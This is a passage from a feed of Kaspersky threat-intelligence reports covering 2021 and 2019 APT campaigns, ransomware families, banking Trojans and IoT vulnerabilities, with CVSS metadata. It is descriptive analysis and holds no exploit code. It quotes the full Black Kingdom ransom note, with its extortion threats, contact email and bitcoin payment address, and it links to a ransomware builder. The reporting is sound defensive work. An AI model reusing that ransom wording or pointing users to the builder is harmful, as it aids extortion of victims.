[PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\n### Andariel adds ransomware to its toolset\n\nIn April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01.png>)\n\nDuring the course of our research, Malwarebytes published a [report](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/>) with technical details about the same series of attacks, which attributed it to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.\n\nHistorically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08.png>)\n\nWe also found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.\n\nNotably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlying the financial motivation of this threat actor.\n\n### Ferocious Kitten\n\n[Ferocious Kitten](<https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/>) is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to [researchers on Twitter](<https://twitter.com/reddrip7/status/1366703445990723585?s=21>). Since then, one of its implants [has been analyzed](<http://www.hackdig.com/03/hack-293629.htm>) by a Chinese threat intelligence firm.\n\nWe were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed &quot;MarkiRAT&quot;, records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim&#x27;s computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.\n\nFerocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren&#x27;t reported very often; and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.\n\n## Other malware\n\n### Evolution of JSWorm ransomware\n\nWhile ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as [WannaCry](<https://securelist.com/wannacry-faq-what-you-need-to-know-today/78411/>) and [NotPetya](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>). Many ransomware gangs have switched to the more profitable tactic of &quot;big-game hunting&quot;; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there&#x27;s now a [well-developed eco-system underpinning ransomware attacks](<https://securelist.com/ransomware-world-in-2021/102169/>).\n\nAs a result, even though [the number of ransomware attacks has fallen](<https://securelist.com/ransomware-by-the-numbers-reassessing-the-threats-global-impact/101965/>), and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.\n\nWe recently published analysis of one such ransomware family, named [JSWorm](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01.png>)\n\nEach &quot;re-branded&quot; version has included alterations to different aspects of the code \u2013 file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.\n\n### Black Kingdom ransomware\n\n[Black Kingdom](<https://securelist.com/black-kingdom-ransomware/102873/>) first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka [ProxyLogon](<https://proxylogon.com/>)). This ransomware family is much less sophisticated than other [Ransomware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/ransomware-as-a-service-raas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RaaS) or big game hunting families. The group&#x27;s involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.\n\nThe malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a [script to recover files encrypted with the embedded key](<https://blog.cyberint.com/black-kingdom-ransomware>).\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nAfter decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>). The group adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key. We were not able to attribute Black Kingdom to any known threat group.\n\nBased on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.\n\n### Gootkit: the cautious banking Trojan\n\n[Gootkit](<https://securelist.com/gootkit-the-cautious-trojan/102731/>) belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it&#x27;s not very common, new versions of the Trojan may remain under the researchers&#x27; radar for long periods.\n\nIt is complex multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploits kits such as Spelevo and RIG. In conjunction with spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.\n\nGootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan&#x27;s loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.\n\nIn 2019, Gootkit stopped operating after it experienced a [data leak](<https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/>), but has been [active again](<https://www.bleepingcomputer.com/news/security/gootkit-malware-returns-to-life-alongside-revil-ransomware/>) since November 2020. Most of the victims are located in EU countries such as Germany and Italy.\n\n### Bizarro banking Trojan expands into Europe\n\nBizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy. This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png>)\n\nAs with [Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.\n\nBizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages and seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12.png>)\n\nBizarro is one of several banking Trojans from South America that have extended their operations into other regions \u2013 mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families.jpeg>)\n\n### Malicious code in APKPure app\n\nIn early April, we [discovered malicious code in version 3.17.18 of the official client of the APKPure app store](<https://securelist.com/apkpure-android-app-store-infected/101845/>), a popular alternative source of Android apps. [The incident seems to be similar to what happened with CamScanner](<https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/>), when the app&#x27;s developer implemented an adware SDK from an unverified source.\n\nWhen launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the [Triada Trojan](<https://www.kaspersky.com/blog/triada-trojan/11481/>). If the device is older (Android 6 or 7, and without security updates installed) it could be the [xHelper Trojan](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).\n\nWe reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.\n\n### Browser lockers\n\nBrowser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The &quot;locking&quot; consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.\n\nThis type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide. The tricks used by the scammers include imitating the infamous &quot;[Blue Screen of Death](<https://encyclopedia.kaspersky.com/glossary/blue-screen-of-death-bsod/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)&quot; (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.\n\nIn our [report on browser lockers](<https://securelist.com/browser-lockers-extortion-disguised-as-a-fine/101735/>), we examined two families of lockers that mimic government websites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-scaled.jpeg>)\n\nBoth families spread mainly via advertising networks, primarily aimed at selling &quot;adult&quot; content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).\n\nThese threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don&#x27;t fall for the cybercriminals&#x27; smoke-and-mirror tactics.\n\n### Malware targets Apple M1 chip\n\nLast November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture. Unfortunately, just months after the release, [malware writers had already adapted several malware families to the new processor](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\n### Attempted supply-chain attack using PHP\n\nIn March, [unknown attackers tried to carry out a supply-chain attack by introducing malicious code to the PHP scripting language](<https://www.kaspersky.com/blog/php-git-backdor/39191/>). The developers of PHP make changes to the code using a common repository built on the GIT version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, in around 80 per cent of which (web servers) PHP is used.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:37", "type": "securelist", "title": "IT threat evolution Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2019-11510", "CVE-2021-1732", "CVE-2021-27065", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-08-12T10:00:37", "id": "SECURELIST:934E8AA177A27150B87EC15F920BF350", "href": "https://securelist.com/it-threat-evolution-q2-2021/103597/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-29T10:36:40", "description": "\n\n## Targeted attacks and malware campaigns\n\n### Mobile espionage targeting the Middle East\n\nAt the end of June we reported the details of a highly targeted campaign that we dubbed 'Operation ViceLeaker' involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our [Threat Intelligence Portal](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built an open-source legitimate 'Conversations' messenger that included the malicious code. You can read more about Operation ViceLeaker [here](<https://securelist.com/fanning-the-flames-viceleaker-operation/90877/>).\n\n### APT33 beefs up its toolset\n\nIn July, we published an update on the 2016-17 activities of [NewsBeef](<https://securelist.com/twas-the-night-before/91599/>) (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with [spear-phishing](<https://encyclopedia.kaspersky.com/glossary/spear-phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) emails, links sent over social media and standalone private messaging applications, and [watering-hole](<https://encyclopedia.kaspersky.com/glossary/watering-hole/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year \u2013 tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. Subscribers to our [private intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>) receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.\n\n### New FinSpy iOS and Android implants found in the wild\n\nWe recently reported on the [latest versions of FinSpy for Android and iOS](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>). Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. The iOS version doesn't provide infection exploits for its customers and so can only be installed on [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) devices \u2013 suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.\n\n### Turla revamps its toolset\n\nTurla (aka Venomous Bear, Uroboros and Waterbug), a high profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset. Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new.NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more [here](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>).\n\n### CloudAtlas uses new infection chain\n\n[Cloud Atlas](<https://securelist.com/recent-cloud-atlas-activity/92016/>) (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts. Cloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor's Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates \u2013 whitelisted per victim \u2013 hosted on remote servers. Previously, Cloud Atlas dropped its 'validator' implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.\n\n### Dtrack banking malware discovered\n\nIn summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers \u2013 we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack [memory dumps](<https://encyclopedia.kaspersky.com/glossary/dump/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the [DarkSeoul campaign](<https://unit42.paloaltonetworks.com/tdrop2-attacks-suggest-dark-seoul-attackers-return/>), dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. Our telemetry indicates that the latest DTrack activity was detected in the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group's arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack [here](<https://securelist.com/my-name-is-dtrack/93338/>).\n\n## Other security news\n\n### Sodin ransomware attacks MSP\n\nIn April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least, because of the way it spread. The Trojan [exploited the CVE-2019-2725 vulnerability](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June, a similar vulnerability was discovered \u2013 CVE-2019-2729. Sodin also carried out [attacks on MSPs](<https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025>). In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, [the attackers penetrated MSP infrastructure using an RDP connection](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), elevated privileges, deactivated security solutions and backups and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn't require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.\n\nRansomware continues to be a major headache for consumers and businesses alike. Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the [Yatron and FortuneCrypt malware](<https://securelist.com/ransomware-two-pieces-of-good-news/93355/>). If you ever face a situation where a ransomware Trojan has encrypted your data, and you don't have a backup, it's always worth checking the [No More Ransom](<https://www.nomoreransom.org/>) site, to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs [here](<https://support.kaspersky.com/viruses/disinfection/10556>) and [here](<https://www.nomoreransom.org/en/decryption-tools.html>).\n\n### The impact of web mining\n\n[Malicious miners](<https://securelist.com/kaspersky-security-bulletin-2018-story-of-the-year-miners/89096/>) are programs designed to hijack the victim's CPU in order to mine crypto-currencies. The business model is simple: infect the computer, use the processing power of their [CPU](<https://en.wikipedia.org/wiki/Central_processing_unit>) or [GPU](<https://en.wikipedia.org/wiki/Graphics_processing_unit>) to generate coins and earn real-world money through legal exchanges and transactions. It's not obvious to the victim that they are infected \u2013 most people seldom use most of their computer's processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there's also another model \u2013 using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have? We recently tried to quantify the economic and environmental impact of web miners; and thereby evaluate the positive benefit of protecting against mining.\n\nThe total power saving can be calculated using the formula \u00b7N, where is the average value of the increase in power consumption of the victim's device during the web mining process, and N is the number of blocked attempts according to KSN ([Kaspersky Security Network](<https://www.kaspersky.com/ksn>)) data for 2018. This figure is equal to 18.8\u00b111.8 gigawatts (GW) \u2013 twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula '\u00b7N\u00b7t', where 't' is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to \u20ac250,000 for residents in Europe.\n\nYou can read our report [here](<https://securelist.com/electricity-and-mining/93292/>).\n\n### Mac OS threat landscape\n\nSome people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so have the number of threats targeting them.\n\nOur database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS. From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; and in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category \u2013 these threats are easier to create, offering a better return on investment for cybercriminals.\n\nThe number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years \u2013 by around 30-40% each year. In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million \u2013 already an increase of 9% over the previous year.\n\nYou can read our report on the current Mac OS threat landscape [here](<https://securelist.com/threats-to-macos-users/93116/>).\n\n### Smart home vulnerabilities\n\nOne of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the [Kaspersky ICS CERT](<https://ics-cert.kaspersky.com/>) team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house. They also discarded the idea of exploiting the programming language interpreter \u2013 the Fibaro hub used the patched version.\n\nOur researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. Among other things, this backup contains a database file with a lot of personal information, including the house's location, geo-location data from the owner's smartphone, the email address used to register with Fibaro, information about smart devices in the owner's home and even the owner's password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story [here](<https://securelist.com/fibaro-smart-home/91416/>).\n\n### Security of smart buildings\n\nThis quarter we also looked at the [security of automation systems in buildings](<https://securelist.com/smart-buildings-threats/93322/>) \u2013 sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled. We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.\n\nMost of the blocked threats were neither targeted, nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building's automation system.\n\n### Smart cars and connected devices\n\nKaspersky has investigated smart car security several times in recent years ([here](<https://securelist.com/mobile-apps-and-stealing-a-connected-car/77576/>) and [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>)), revealing a number of security issues. As vehicles become smarter and more connected they are also becoming more exposed. However, this doesn't just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience \u2013 from car scanners to tuning gadgets. In a recent report, [we reviewed a number of automotive connected devices](<https://securelist.com/on-the-iot-road/91833/>) and reviewed their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.\n\nWe found the security of these devices more or less adequate, leaving aside minor issues. This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It's also due to the vigilance of vendors. However, as we move towards a more and more connected future, it's important to remember that the smarter an object is the more attention should be paid to security in the development and updating of a device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim's car or spy on an entire car fleet.\n\nWe continue to develop [KasperskyOS](<https://os.kaspersky.com/2019/05/20/kasperskyos-an-immune-based-approach-to-information-system-security/>), to help customers secure connected systems \u2013 including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.\n\nIf you're considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it's possible to apply security updates to it. Don't automatically buy the most recently released product, since it might contain a security flaw that hasn't yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the 'mobile dimension' of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.\n\n### Personal data theft\n\nWe've become used to a steady stream of reports in the news about data breaches. Recent examples include the [theft of 23,205,290 email addresses](<https://www.forbes.com/sites/daveywinder/2019/08/05/cafepress-hacked-23m-accounts-compromised-is-yours-one-of-them/#625d70cf407e>) together with passwords weakly stored as base64 SHA-1 encoded hashes from CafePress. Worryingly, the hack was reported by [Have I Been Pwned](<https://haveibeenpwned.com>) \u2013 CafePress didn't notify its customers until some months after the breach had occurred.\n\nIn August, two Israeli [researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>). The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.\n\n[Facebook has faced criticism on several occasions for failing to handle customers' data properly](<https://www.kaspersky.com/blog/facebook-10-fails/26980/>). In the latest of a long list of incidents, hundreds of millions of [phone numbers linked to Facebook accounts were found online](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/?guccounter=1>) on a server that wasn't protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.\n\nOn September 12, mobile gaming company [Zynga reported that some player account data may have been accessed illegally by 'outside hackers'](<https://www.scmagazine.com/home/security-news/the-word-is-out-zynga-was-breached/>). Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of _Words With Friends_, as well as 